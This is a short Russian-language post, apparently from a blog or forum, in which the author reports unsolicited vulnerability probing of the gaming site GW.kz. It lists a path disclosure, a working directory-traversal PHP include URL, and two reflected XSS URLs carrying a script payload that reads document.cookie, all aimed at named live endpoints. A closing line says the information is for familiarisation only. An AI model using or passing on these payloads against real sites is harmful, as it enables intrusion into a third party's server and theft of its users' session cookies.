Уязвимость GW.kz

Появилось свободное время, решил заняться чем нибудь, а именно проверить на уязвимости популярный игровой сайт, GW.KZ

Первое, что обнаружил, это раскрытие путей до домашней директории: /home/www/gameworld.kz/.

Далее PHP-инклуд: http://gw.kz/?part=../../../../home/www/gameworld.kz/mods/news, но фича с нулевым байтом не применима, так как я понял, у них версия PHP 5.3.X.
Путь, нашел с помощью: http://gw.kz/robots.txt

Проверив форум, нашел XSS: http://gameworld.kz/forum/unauthorized.php?errnum=8&param1=1%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E

Ещё одна XSS в движке баннерной системы: http://gw.kz/include/kcell.inc.php?url=1%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E

Информация в этой статье дана только в ознакомительных целях.